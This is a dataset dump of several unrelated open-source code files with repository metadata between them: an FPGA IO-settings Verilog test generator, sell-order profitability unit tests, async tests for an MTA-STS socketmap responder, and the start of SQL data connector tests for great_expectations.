] | null | null | null | xc7/tests/iosettings/generate.py | nfrancque/symbiflow-arch-defs | 14b0f43a50b515602bd48606e4edf8366459c63f | [
"ISC"
] | null | null | null | xc7/tests/iosettings/generate.py | nfrancque/symbiflow-arch-defs | 14b0f43a50b515602bd48606e4edf8366459c63f | [
"ISC"
] | null | null | null | #!/usr/bin/env python3
"""
The generator
"""
import argparse
import simplejson as json
# =============================================================================
PINOUT = {
"basys3":
{
"BUFG":
"BUFGCTRL_X0Y0",
"clock":
"W5",
"led":
[
"U16",
"E19",
"U19",
"V19",
"W18",
"U15",
"U14",
"V14",
"V13",
"V3",
"W3",
"U3",
"P3",
"N3",
"P1",
"L1",
],
"single-ended":
[
# Basys3 JB 1-4, 7-10
"A14",
"A16",
"B15",
"B16",
"A15",
"A17",
"C15",
"C16",
# Basys3 JC 1-4, 7-10
"K17",
"M18",
"N17",
"P18",
"L17",
"M19",
"P17",
"R18"
],
"differential":
[
# Basys3 JB
("A14", "A15"),
("A16", "A17"),
("C15", "B15"),
("B16", "C16"),
# Basys3 JC
("M19", "M18"),
("K17", "L17"),
("N17", "P17"),
("P18", "R18"),
]
},
"arty":
{
"BUFG":
"BUFGCTRL_X0Y0",
"clock":
"E3",
"led":
[
"G6", # R0
"G3", # R1
"J3", # R2
"K1", # R3
"F6", # G0
"J4", # G1
"J2", # G2
"H6", # G3
"E1", # B0
"G4", # B1
"H4", # B2
"K2", # B3
"H5", # LED4
"J5", # LED5
"T9", # LED6
"T10", # LED7
],
"single-ended":
[
# Pmod JB
"E15",
"E16",
"D15",
"C15",
"J17",
"J18",
"K15",
"J15",
# Pmod JC
"U12",
"V12",
"V10",
"V11",
"U14",
"V14",
"T13",
"U13",
],
"differential":
[
# Pmod JB
("E15", "E16"),
("D15", "C15"),
("J17", "J18"),
("K15", "J15"),
# Pmod JC
("U12", "V12"),
("V10", "V11"),
("U14", "V14"),
("T13", "U13"),
]
},
# Pinout for "bottom" routing graph of 50t, only for Basys3. These pins may
# not correspond to actual LEDs so the design may not be suitable for testing
# on hardware but it will pass all the checks on CI.
"basys3-bottom":
{
"BUFG":
"BUFGCTRL_X0Y0",
"clock":
"W5", # Bank 34
"led":
[
"V3", # LED9
"W3", # LED10
"U3", # LED11
"W7", # CA
"W6", # CB
"U8", # CC
"V8", # CD
"U5", # CE
"V5", # CF
"U7", # CG
],
"single-ended":
[
# Basys3 JC 1-4, 7-10
"K17",
"M18",
"N17",
"P18",
"L17",
"M19",
"P17",
"R18",
"U15", # LEDs
"U16",
"V13",
"V14",
],
"differential":
[
# Basys3 JC
("M18", "M19"),
("L17", "K17"),
("P17", "N17"),
("R18", "P18"),
]
},
}
def unquote(s):
if isinstance(s, str):
return s.replace("\"", "")
return s
# =============================================================================
def generate_output(board, iostandard, drives, slews):
"""
Generates a design which outputs 100Hz square wave to a number of pins
in which each one has different DRIVE+SLEW setting. The IOSTANDARD is
common for all of them.
"""
num_ports = len(drives) * len(slews)
iosettings = {}
# Header
verilog = """
module top(
input wire clk,
output wire [{}:0] out
);
""".format(num_ports - 1)
pcf = """
set_io clk {}
""".format(PINOUT[board]["clock"])
# 100Hz square wave generator
verilog += """
wire clk_bufg;
reg [31:0] cnt_ps;
reg tick;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
initial cnt_ps <= 0;
initial tick <= 0;
always @(posedge clk_bufg)
if (cnt_ps >= (100000000 / (2*100)) - 1) begin
cnt_ps <= 0;
tick <= !tick;
end else begin
cnt_ps <= cnt_ps + 1;
tick <= tick;
end
""".format(PINOUT[board]["BUFG"])
# Output buffers
index = 0
for slew in slews:
for drive in drives:
params = {"IOSTANDARD": "\"{}\"".format(iostandard)}
if drive is not None and drive != "0":
params["DRIVE"] = int(drive)
if slew is not None:
params["SLEW"] = "\"{}\"".format(slew)
pin = PINOUT[board]["single-ended"][index]
verilog += """
OBUF # ({params}) obuf_{index} (
.I(tick),
.O(out[{index}])
);
""".format(
params=",".join(
[".{}({})".format(k, v) for k, v in params.items()]
),
index=index
)
if num_ports > 1:
pcf += "set_io out[{}] {}\n".format(index, pin)
else:
pcf += "set_io out {}\n".format(pin)
iosettings[pin] = {k: unquote(v) for k, v in params.items()}
index += 1
# Footer
verilog += """
endmodule
"""
return verilog, pcf, iosettings
def generate_input(board, iostandard, in_terms):
"""
Generates a design with singnals from external pins go through IBUFs and
registers to LEDs. Each IBUF has differen IN_TERM setting.
"""
num_ports = len(in_terms)
iosettings = {}
# Header
verilog = """
module top(
input wire clk,
input wire [{N}:0] inp,
output reg [{N}:0] led
);
initial led <= 0;
""".format(N=num_ports - 1)
pcf = """
set_io clk {}
""".format(PINOUT[board]["clock"])
# BUFG
verilog += """
wire clk_bufg;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
""".format(PINOUT[board]["BUFG"])
# Input buffers + registers
index = 0
for in_term in in_terms:
params = {
"IOSTANDARD": "\"{}\"".format(iostandard),
"IN_TERM": "\"{}\"".format(in_term)
}
pin = PINOUT[board]["single-ended"][index]
verilog += """
wire inp_b[{index}];
IBUF # ({params}) ibuf_{index} (
.I(inp[{index}]),
.O(inp_b[{index}])
);
always @(posedge clk_bufg)
led[{index}] <= inp_b[{index}];
""".format(
params=",".join(
[".{}({})".format(k, v) for k, v in params.items()]
),
index=index
)
if num_ports > 1:
pcf += "set_io inp[{}] {}\n".format(index, pin)
pcf += "set_io led[{}] {}\n".format(
index, PINOUT[board]["led"][index]
)
else:
pcf += "set_io inp {}\n".format(pin)
pcf += "set_io led {}\n".format(PINOUT[board]["led"][index])
iosettings[pin] = {k: unquote(v) for k, v in params.items()}
index += 1
# Footer
verilog += """
endmodule
"""
return verilog, pcf, iosettings
def generate_inout(board, iostandard, drives, slews):
"""
Generates a design with INOUT buffers. Buffers cycle through states:
L,Z,H,Z with 100Hz frequency. During the Z state, IO pins are latched
and their state is presented on LEDs.
"""
num_ports = len(drives) * len(slews)
iosettings = {}
# Header
verilog = """
module top(
input wire clk,
inout wire [{N}:0] ino,
output reg [{N}:0] led
);
initial led <= 0;
wire [{N}:0] ino_i;
reg ino_o;
reg ino_t;
""".format(N=num_ports - 1)
pcf = """
set_io clk {}
""".format(PINOUT[board]["clock"])
# Control signal generator, data sampler
verilog += """
wire clk_bufg;
reg [31:0] cnt_ps;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
initial cnt_ps <= 32'd0;
initial ino_o <= 1'b0;
initial ino_t <= 1'b1;
always @(posedge clk_bufg)
if (cnt_ps >= (100000000 / (2*100)) - 1) begin
cnt_ps <= 0;
ino_t <= !ino_t;
if (ino_t == 1'b1)
ino_o <= !ino_o;
end else begin
cnt_ps <= cnt_ps + 1;
ino_t <= ino_t;
ino_o <= ino_o;
end
always @(posedge clk_bufg)
if (ino_t == 1'b1)
led <= ino_i;
else
led <= led;
""".format(PINOUT[board]["BUFG"])
# INOUT buffers
index = 0
for slew in slews:
for drive in drives:
params = {"IOSTANDARD": "\"{}\"".format(iostandard)}
if drive is not None and drive != "0":
params["DRIVE"] = int(drive)
if slew is not None:
params["SLEW"] = "\"{}\"".format(slew)
pin = PINOUT[board]["single-ended"][index]
verilog += """
IOBUF # ({params}) iobuf_{index} (
.I(ino_o),
.O(ino_i[{index}]),
.T(ino_t),
.IO(ino[{index}])
);
""".format(
params=",".join(
[".{}({})".format(k, v) for k, v in params.items()]
),
index=index
)
if num_ports > 1:
pcf += "set_io ino[{}] {}\n".format(index, pin)
pcf += "set_io led[{}] {}\n".format(
index, PINOUT[board]["led"][index]
)
else:
pcf += "set_io ino {}\n".format(pin)
pcf += "set_io led {}\n".format(PINOUT[board]["led"][index])
iosettings[pin] = {k: unquote(v) for k, v in params.items()}
index += 1
# Footer
verilog += """
endmodule
"""
return verilog, pcf, iosettings
# =============================================================================
def generate_diff_output(board, iostandard, drives, slews):
"""
Generates a design which outputs 100Hz square wave to a number of pins
in which each one has different DRIVE+SLEW setting. The IOSTANDARD is
common for all of them.
"""
num_ports = len(drives) * len(slews)
iosettings = {}
# Header
verilog = """
module top(
input wire clk,
output wire [{N}:0] out_p,
output wire [{N}:0] out_n
);
""".format(N=num_ports - 1)
pcf = """
set_io clk {}
""".format(PINOUT[board]["clock"])
# 100Hz square wave generator
verilog += """
wire clk_bufg;
reg [31:0] cnt_ps;
reg tick;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
initial cnt_ps <= 0;
initial tick <= 0;
always @(posedge clk_bufg)
if (cnt_ps >= (100000000 / (2*100)) - 1) begin
cnt_ps <= 0;
tick <= !tick;
end else begin
cnt_ps <= cnt_ps + 1;
tick <= tick;
end
""".format(PINOUT[board]["BUFG"])
# Output buffers
index = 0
for slew in slews:
for drive in drives:
params = {"IOSTANDARD": "\"{}\"".format(iostandard)}
if drive is not None and drive != "0":
params["DRIVE"] = int(drive)
if slew is not None:
params["SLEW"] = "\"{}\"".format(slew)
pins = PINOUT[board]["differential"][index]
verilog += """
OBUFDS # ({params}) obuf_{index} (
.I(tick),
.O(out_p[{index}]),
.OB(out_n[{index}])
);
""".format(
params=",".join(
[".{}({})".format(k, v) for k, v in params.items()]
),
index=index
)
if num_ports > 1:
pcf += "set_io out_p[{}] {}\n".format(index, pins[0])
pcf += "set_io out_n[{}] {}\n".format(index, pins[1])
else:
pcf += "set_io out_p {}\n".format(pins[0])
pcf += "set_io out_n {}\n".format(pins[1])
iosettings[pins[0]] = {k: unquote(v) for k, v in params.items()}
iosettings[pins[1]] = {k: unquote(v) for k, v in params.items()}
index += 1
# Footer
verilog += """
endmodule
"""
return verilog, pcf, iosettings
def generate_diff_input(board, iostandard, in_terms):
"""
Generates a design with singnals from external pins go through IBUFs and
registers to LEDs. Each IBUF has differen IN_TERM setting.
"""
num_ports = len(in_terms)
iosettings = {}
# Header
verilog = """
module top(
input wire clk,
input wire [{N}:0] inp_p,
input wire [{N}:0] inp_n,
output reg [{N}:0] led
);
initial led <= 0;
""".format(N=num_ports - 1)
pcf = """
set_io clk {}
""".format(PINOUT[board]["clock"])
# BUFG
verilog += """
wire clk_bufg;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
""".format(PINOUT[board]["BUFG"])
# Input buffers + registers
index = 0
for in_term in in_terms:
params = {
"IOSTANDARD": "\"{}\"".format(iostandard),
"IN_TERM": "\"{}\"".format(in_term)
}
pins = PINOUT[board]["differential"][index]
verilog += """
wire inp_b[{index}];
IBUFDS # ({params}) ibuf_{index} (
.I(inp_p[{index}]),
.IB(inp_n[{index}]),
.O(inp_b[{index}])
);
always @(posedge clk_bufg)
led[{index}] <= inp_b[{index}];
""".format(
params=",".join(
[".{}({})".format(k, v) for k, v in params.items()]
),
index=index
)
if num_ports > 1:
pcf += "set_io inp_p[{}] {}\n".format(index, pins[0])
pcf += "set_io inp_n[{}] {}\n".format(index, pins[1])
pcf += "set_io led[{}] {}\n".format(
index, PINOUT[board]["led"][index]
)
else:
pcf += "set_io inp_p {}\n".format(pins[0])
pcf += "set_io inp_n {}\n".format(pins[1])
pcf += "set_io led {}\n".format(PINOUT[board]["led"][index])
iosettings[pins[0]] = {k: unquote(v) for k, v in params.items()}
iosettings[pins[1]] = {k: unquote(v) for k, v in params.items()}
index += 1
# Footer
verilog += """
endmodule
"""
return verilog, pcf, iosettings
def generate_diff_inout(board, iostandard, drives, slews):
"""
Generates a design with INOUT buffers. Buffers cycle through states:
L,Z,H,Z with 100Hz frequency. During the Z state, IO pins are latched
and their state is presented on LEDs.
"""
num_ports = len(drives) * len(slews)
iosettings = {}
# Header
verilog = """
module top(
input wire clk,
inout wire [{N}:0] ino_p,
inout wire [{N}:0] ino_n,
output reg [{N}:0] led
);
initial led <= 0;
wire [{N}:0] ino_i;
reg ino_o;
reg ino_t;
""".format(N=num_ports - 1)
pcf = """
set_io clk {}
""".format(PINOUT[board]["clock"])
# Control signal generator, data sampler
verilog += """
wire clk_bufg;
reg [31:0] cnt_ps;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
initial cnt_ps <= 32'd0;
initial ino_o <= 1'b0;
initial ino_t <= 1'b1;
always @(posedge clk_bufg)
if (cnt_ps >= (100000000 / (2*100)) - 1) begin
cnt_ps <= 0;
ino_t <= !ino_t;
if (ino_t == 1'b1)
ino_o <= !ino_o;
end else begin
cnt_ps <= cnt_ps + 1;
ino_t <= ino_t;
ino_o <= ino_o;
end
always @(posedge clk_bufg)
if (ino_t == 1'b1)
led <= ino_i;
else
led <= led;
""".format(PINOUT[board]["BUFG"])
# INOUT buffers
index = 0
for slew in slews:
for drive in drives:
params = {"IOSTANDARD": "\"{}\"".format(iostandard)}
if drive is not None and drive != "0":
params["DRIVE"] = int(drive)
if slew is not None:
params["SLEW"] = "\"{}\"".format(slew)
pins = PINOUT[board]["differential"][index]
verilog += """
IOBUFDS # ({params}) iobuf_{index} (
.I(ino_o),
.O(ino_i[{index}]),
.T(ino_t),
.IO(ino_p[{index}]),
.IOB(ino_n[{index}])
);
""".format(
params=",".join(
[".{}({})".format(k, v) for k, v in params.items()]
),
index=index
)
if num_ports > 1:
pcf += "set_io ino_p[{}] {}\n".format(index, pins[0])
pcf += "set_io ino_n[{}] {}\n".format(index, pins[1])
pcf += "set_io led[{}] {}\n".format(
index, PINOUT[board]["led"][index]
)
else:
pcf += "set_io ino_p {}\n".format(pins[0])
pcf += "set_io ino_n {}\n".format(pins[1])
pcf += "set_io led {}\n".format(PINOUT[board]["led"][index])
iosettings[pins[0]] = {k: unquote(v) for k, v in params.items()}
iosettings[pins[1]] = {k: unquote(v) for k, v in params.items()}
index += 1
# Footer
verilog += """
endmodule
"""
return verilog, pcf, iosettings
# =============================================================================
def main():
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("--board", required=True, help="Board")
parser.add_argument("--mode", required=True, help="Generation mode")
parser.add_argument("--iostandard", required=True, help="IOSTANDARD")
parser.add_argument("--drive", required=False, nargs="+", help="DRIVE(s)")
parser.add_argument("--slew", required=False, nargs="+", help="SLEW(s)")
parser.add_argument(
"--in_term", required=False, nargs="+", help="IN_TERM(s)"
)
parser.add_argument("-o", required=True, help="Design name")
args = parser.parse_args()
# Generate design for output IO settings
if args.mode == "output":
verilog, pcf, iosettings = generate_output(
args.board, args.iostandard, args.drive, args.slew
)
elif args.mode == "input":
verilog, pcf, iosettings = generate_input(
args.board, args.iostandard, args.in_term
)
elif args.mode == "inout":
verilog, pcf, iosettings = generate_inout(
args.board, args.iostandard, args.drive, args.slew
)
elif args.mode == "diff_output":
verilog, pcf, iosettings = generate_diff_output(
args.board, args.iostandard, args.drive, args.slew
)
elif args.mode == "diff_input":
verilog, pcf, iosettings = generate_diff_input(
args.board, args.iostandard, args.in_term
)
elif args.mode == "diff_inout":
verilog, pcf, iosettings = generate_diff_inout(
args.board, args.iostandard, args.drive, args.slew
)
else:
raise RuntimeError("Unknown generation mode '{}'".format(args.mode))
# Write verilog
with open(args.o + ".v", "w") as fp:
fp.write(verilog)
# Write PCF
with open(args.o + ".pcf", "w") as fp:
fp.write(pcf)
# Write iosettings
if iosettings is not None:
with open(args.o + ".json", "w") as fp:
json.dump(iosettings, fp, indent=2)
if __name__ == "__main__":
main()
| 25.618644 | 81 | 0.422192 | 2,224 | 21,161 | 3.915468 | 0.138489 | 0.022049 | 0.029398 | 0.016537 | 0.829237 | 0.785485 | 0.774001 | 0.762977 | 0.76022 | 0.736909 | 0 | 0.037295 | 0.410803 | 21,161 | 825 | 82 | 25.649697 | 0.661133 | 0.102027 | 0 | 0.663366 | 0 | 0.014851 | 0.305695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013201 | false | 0 | 0.0033 | 0 | 0.029703 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f78d642eb939480bb4e1e75a45d15843dec751aa | 1,472 | py | Python | tests/models/test_sellOrder.py | Lucasgms/sell-orders-app | 26a7f423ce42a7d247e4471f6b19d0430f439d4d | [
"MIT"
] | null | null | null | tests/models/test_sellOrder.py | Lucasgms/sell-orders-app | 26a7f423ce42a7d247e4471f6b19d0430f439d4d | [
"MIT"
] | null | null | null | tests/models/test_sellOrder.py | Lucasgms/sell-orders-app | 26a7f423ce42a7d247e4471f6b19d0430f439d4d | [
"MIT"
] | null | null | null | from unittest import TestCase
from models.product import Product
from models.sell_order import SellOrder
from models.user import User
class TestSellOrder(TestCase):
def test___set_profitability_great(self):
client = User('Lucas')
product = Product('Product 1', 100.0, 0)
sell_order = SellOrder(client, product, 1, 100.1)
client.purchases.append(sell_order)
product.sell_orders.append(sell_order)
assert sell_order.profitability == 'Ótima'
def test___set_profitability_good_1(self):
client = User('Lucas')
product = Product('Product 1', 100.0, 0)
sell_order = SellOrder(client, product, 1, 100.0)
client.purchases.append(sell_order)
product.sell_orders.append(sell_order)
assert sell_order.profitability == 'Boa'
def test___set_profitability_good_2(self):
client = User('Lucas')
product = Product('Product 1', 100.0, 0)
sell_order = SellOrder(client, product, 1, 90.0)
client.purchases.append(sell_order)
product.sell_orders.append(sell_order)
assert sell_order.profitability == 'Boa'
def test___set_profitability_bad(self):
client = User('Lucas')
product = Product('Product 1', 100.0, 0)
sell_order = SellOrder(client, product, 1, 89.9)
client.purchases.append(sell_order)
product.sell_orders.append(sell_order)
assert sell_order.profitability == 'Ruim'
| 33.454545 | 57 | 0.675272 | 185 | 1,472 | 5.140541 | 0.194595 | 0.160883 | 0.126183 | 0.063091 | 0.802313 | 0.769716 | 0.769716 | 0.769716 | 0.769716 | 0.769716 | 0 | 0.038462 | 0.222826 | 1,472 | 43 | 58 | 34.232558 | 0.792832 | 0 | 0 | 0.545455 | 0 | 0 | 0.048234 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 1 | 0.121212 | false | 0 | 0.121212 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e3be0ce4867c99a7932c217d0227baf0b74c1001 | 3,860 | py | Python | tests/test_responder_volatile.py | galme/postfix-mta-sts-resolver | 3456620c8da0b2423d20225fab581f8d6896dc96 | [
"MIT"
] | null | null | null | tests/test_responder_volatile.py | galme/postfix-mta-sts-resolver | 3456620c8da0b2423d20225fab581f8d6896dc96 | [
"MIT"
] | null | null | null | tests/test_responder_volatile.py | galme/postfix-mta-sts-resolver | 3456620c8da0b2423d20225fab581f8d6896dc96 | [
"MIT"
] | null | null | null | import sys
import asyncio
import itertools
import socket
import pytest
from postfix_mta_sts_resolver import netstring
from postfix_mta_sts_resolver.responder import STSSocketmapResponder
import postfix_mta_sts_resolver.utils as utils
from async_generator import yield_, async_generator
@pytest.fixture
@async_generator
async def responder(event_loop):
import postfix_mta_sts_resolver.utils as utils
cfg = utils.populate_cfg_defaults(None)
cfg["port"] = 38461
cfg["shutdown_timeout"] = 1
cfg["cache_grace"] = 0
cfg["zones"]["test2"] = cfg["default_zone"]
resp = STSSocketmapResponder(cfg, event_loop)
await resp.start()
result = resp, cfg['host'], cfg['port']
await yield_(result)
await resp.stop()
@pytest.mark.asyncio
@pytest.mark.timeout(5)
async def test_hanging_stop(responder):
resp, host, port = responder
reader, writer = await asyncio.open_connection(host, port)
await resp.stop()
assert await reader.read() == b''
writer.close()
@pytest.mark.asyncio
@pytest.mark.timeout(5)
async def test_inprogress_stop(responder):
resp, host, port = responder
reader, writer = await asyncio.open_connection(host, port)
writer.write(netstring.encode(b'test blackhole.loc'))
await writer.drain()
await asyncio.sleep(0.2)
await resp.stop()
assert await reader.read() == b''
writer.close()
@pytest.mark.asyncio
@pytest.mark.timeout(5)
async def test_extended_stop(responder):
resp, host, port = responder
reader, writer = await asyncio.open_connection(host, port)
writer.write(netstring.encode(b'test blackhole.loc'))
writer.write(netstring.encode(b'test blackhole.loc'))
writer.write(netstring.encode(b'test blackhole.loc'))
await writer.drain()
await asyncio.sleep(0.2)
await resp.stop()
assert await reader.read() == b''
writer.close()
@pytest.mark.asyncio
@pytest.mark.timeout(7)
async def test_grace_expired(responder):
resp, host, port = responder
reader, writer = await asyncio.open_connection(host, port)
stream_reader = netstring.StreamReader()
async def answer():
string_reader = stream_reader.next_string()
res = b''
while True:
try:
part = string_reader.read()
except netstring.WantRead:
data = await reader.read(4096)
assert data
stream_reader.feed(data)
else:
if not part:
break
res += part
return res
try:
writer.write(netstring.encode(b'test good.loc'))
answer_a = await answer()
await asyncio.sleep(2)
writer.write(netstring.encode(b'test good.loc'))
answer_b = await answer()
assert answer_a == answer_b
finally:
writer.close()
@pytest.mark.asyncio
@pytest.mark.timeout(7)
async def test_fast_expire(responder):
resp, host, port = responder
reader, writer = await asyncio.open_connection(host, port)
stream_reader = netstring.StreamReader()
async def answer():
string_reader = stream_reader.next_string()
res = b''
while True:
try:
part = string_reader.read()
except netstring.WantRead:
data = await reader.read(4096)
assert data
stream_reader.feed(data)
else:
if not part:
break
res += part
return res
try:
writer.write(netstring.encode(b'test fast-expire.loc'))
answer_a = await answer()
await asyncio.sleep(2)
writer.write(netstring.encode(b'test fast-expire.loc'))
answer_b = await answer()
assert answer_a == answer_b == b'OK secure match=mail.loc'
finally:
writer.close()
| 30.88 | 68 | 0.643782 | 475 | 3,860 | 5.107368 | 0.204211 | 0.04122 | 0.065952 | 0.085738 | 0.790602 | 0.769992 | 0.769992 | 0.769992 | 0.73784 | 0.734542 | 0 | 0.009372 | 0.253627 | 3,860 | 124 | 69 | 31.129032 | 0.832697 | 0 | 0 | 0.765217 | 0 | 0 | 0.057787 | 0 | 0 | 0 | 0 | 0 | 0.06087 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.104348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5423f37f195571e043e7da0e6be275bf8685e506 | 44,985 | py | Python | tests/datasource/data_connector/test_sql_data_connector.py | arunnthevapalan/great_expectations | 97f1481bcd1c3f4d8878c6f383f4e6f008b20cd1 | [
"Apache-2.0"
] | 1 | 2022-03-16T22:09:49.000Z | 2022-03-16T22:09:49.000Z | tests/datasource/data_connector/test_sql_data_connector.py | draev/great_expectations | 317e15ee7e50f6e0d537b62154177440f33b795d | [
"Apache-2.0"
] | null | null | null | tests/datasource/data_connector/test_sql_data_connector.py | draev/great_expectations | 317e15ee7e50f6e0d537b62154177440f33b795d | [
"Apache-2.0"
] | 1 | 2022-03-03T16:47:32.000Z | 2022-03-03T16:47:32.000Z | import json
import random
import pytest
from ruamel.yaml import YAML
from great_expectations.core.batch import Batch, BatchRequest
from great_expectations.core.batch_spec import SqlAlchemyDatasourceBatchSpec
from great_expectations.data_context.util import instantiate_class_from_config
from great_expectations.datasource.data_connector import ConfiguredAssetSqlDataConnector
try:
sqlalchemy = pytest.importorskip("sqlalchemy")
except ImportError:
sqlalchemy = None
import great_expectations.exceptions as ge_exceptions
from great_expectations.validator.validator import Validator
yaml = YAML(typ="safe")
# TODO: <Alex>ALEX -- Some methods in this module are misplaced and/or provide no action; this must be repaired.</Alex>
def test_basic_self_check(test_cases_for_sql_data_connector_sqlite_execution_engine):
random.seed(0)
execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine
config = yaml.load(
"""
name: my_sql_data_connector
datasource_name: FAKE_Datasource_NAME
assets:
table_partitioned_by_date_column__A:
#table_name: events # If table_name is omitted, then the table_name defaults to the asset name
splitter_method: _split_on_column_value
splitter_kwargs:
column_name: date
""",
)
config["execution_engine"] = execution_engine
my_data_connector = ConfiguredAssetSqlDataConnector(**config)
report = my_data_connector.self_check()
print(json.dumps(report, indent=2))
assert report == {
"class_name": "ConfiguredAssetSqlDataConnector",
"data_asset_count": 1,
"example_data_asset_names": ["table_partitioned_by_date_column__A"],
"data_assets": {
"table_partitioned_by_date_column__A": {
"batch_definition_count": 30,
"example_data_references": [
{"date": "2020-01-01"},
{"date": "2020-01-02"},
{"date": "2020-01-03"},
],
}
},
"unmatched_data_reference_count": 0,
"example_unmatched_data_references": [],
# FIXME: (Sam) example_data_reference removed temporarily in PR #2590:
# "example_data_reference": {
# "n_rows": 8,
# "batch_spec": {
# "table_name": "table_partitioned_by_date_column__A",
# "data_asset_name": "table_partitioned_by_date_column__A",
# "batch_identifiers": {"date": "2020-01-02"},
# "splitter_method": "_split_on_column_value",
# "splitter_kwargs": {"column_name": "date"},
# },
# },
}
def test_get_batch_definition_list_from_batch_request(
test_cases_for_sql_data_connector_sqlite_execution_engine,
):
random.seed(0)
db = test_cases_for_sql_data_connector_sqlite_execution_engine
config = yaml.load(
"""
name: my_sql_data_connector
datasource_name: FAKE_Datasource_NAME
assets:
table_partitioned_by_date_column__A:
splitter_method: _split_on_column_value
splitter_kwargs:
column_name: date
""",
)
config["execution_engine"] = db
my_data_connector = ConfiguredAssetSqlDataConnector(**config)
my_data_connector._refresh_data_references_cache()
batch_definition_list = (
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest(
datasource_name="FAKE_Datasource_NAME",
data_connector_name="my_sql_data_connector",
data_asset_name="table_partitioned_by_date_column__A",
data_connector_query={
"batch_filter_parameters": {"date": "2020-01-01"}
},
)
)
)
assert len(batch_definition_list) == 1
batch_definition_list = (
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest(
datasource_name="FAKE_Datasource_NAME",
data_connector_name="my_sql_data_connector",
data_asset_name="table_partitioned_by_date_column__A",
data_connector_query={"batch_filter_parameters": {}},
)
)
)
assert len(batch_definition_list) == 30
# Note: Abe 20201109: It would be nice to put in safeguards for mistakes like this.
# In this case, "date" should go inside "batch_identifiers".
# Currently, the method ignores "date" entirely, and matches on too many partitions.
# I don't think this is unique to ConfiguredAssetSqlDataConnector.
# with pytest.raises(ge_exceptions.DataConnectorError) as e:
# batch_definition_list = my_data_connector.get_batch_definition_list_from_batch_request(
# batch_request=BatchRequest(
# datasource_name="FAKE_Datasource_NAME",
# data_connector_name="my_sql_data_connector",
# data_asset_name="table_partitioned_by_date_column__A",
# data_connector_query={
# "batch_filter_parameters": {},
# "date" : "2020-01-01",
# }
# )
# )
# assert "Unmatched key" in e.value.message
batch_definition_list = (
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest(
datasource_name="FAKE_Datasource_NAME",
data_connector_name="my_sql_data_connector",
data_asset_name="table_partitioned_by_date_column__A",
)
)
)
assert len(batch_definition_list) == 30
with pytest.raises(TypeError):
# noinspection PyArgumentList
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest(
datasource_name="FAKE_Datasource_NAME",
data_connector_name="my_sql_data_connector",
)
)
with pytest.raises(TypeError):
# noinspection PyArgumentList
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest(datasource_name="FAKE_Datasource_NAME")
)
with pytest.raises(TypeError):
# noinspection PyArgumentList
my_data_connector.get_batch_definition_list_from_batch_request(
batch_request=BatchRequest()
)
def test_example_A(test_cases_for_sql_data_connector_sqlite_execution_engine):
random.seed(0)
db = test_cases_for_sql_data_connector_sqlite_execution_engine
config = yaml.load(
"""
name: my_sql_data_connector
datasource_name: FAKE_Datasource_NAME
assets:
table_partitioned_by_date_column__A:
splitter_method: _split_on_column_value
splitter_kwargs:
column_name: date
""",
)
config["execution_engine"] = db
my_data_connector = ConfiguredAssetSqlDataConnector(**config)
report = my_data_connector.self_check()
print(json.dumps(report, indent=2))
assert report == {
"class_name": "ConfiguredAssetSqlDataConnector",
"data_asset_count": 1,
"example_data_asset_names": ["table_partitioned_by_date_column__A"],
"data_assets": {
"table_partitioned_by_date_column__A": {
"batch_definition_count": 30,
"example_data_references": [
{"date": "2020-01-01"},
{"date": "2020-01-02"},
{"date": "2020-01-03"},
],
}
},
"unmatched_data_reference_count": 0,
"example_unmatched_data_references": [],
# FIXME: (Sam) example_data_reference removed temporarily in PR #2590:
# "example_data_reference": {
# "n_rows": 8,
# "batch_spec": {
# "table_name": "table_partitioned_by_date_column__A",
# "data_asset_name": "table_partitioned_by_date_column__A",
# "batch_identifiers": {"date": "2020-01-02"},
# "splitter_method": "_split_on_column_value",
# "splitter_kwargs": {"column_name": "date"},
# },
# },
}
def test_example_B(test_cases_for_sql_data_connector_sqlite_execution_engine):
random.seed(0)
db = test_cases_for_sql_data_connector_sqlite_execution_engine
config = yaml.load(
"""
name: my_sql_data_connector
datasource_name: FAKE_Datasource_NAME
assets:
table_partitioned_by_timestamp_column__B:
splitter_method: _split_on_converted_datetime
splitter_kwargs:
column_name: timestamp
"""
)
config["execution_engine"] = db
my_data_connector = ConfiguredAssetSqlDataConnector(**config)
report = my_data_connector.self_check()
print(json.dumps(report, indent=2))
assert report == {
"class_name": "ConfiguredAssetSqlDataConnector",
"data_asset_count": 1,
"example_data_asset_names": ["table_partitioned_by_timestamp_column__B"],
"data_assets": {
"table_partitioned_by_timestamp_column__B": {
"batch_definition_count": 30,
"example_data_references": [
{"timestamp": "2020-01-01"},
{"timestamp": "2020-01-02"},
{"timestamp": "2020-01-03"},
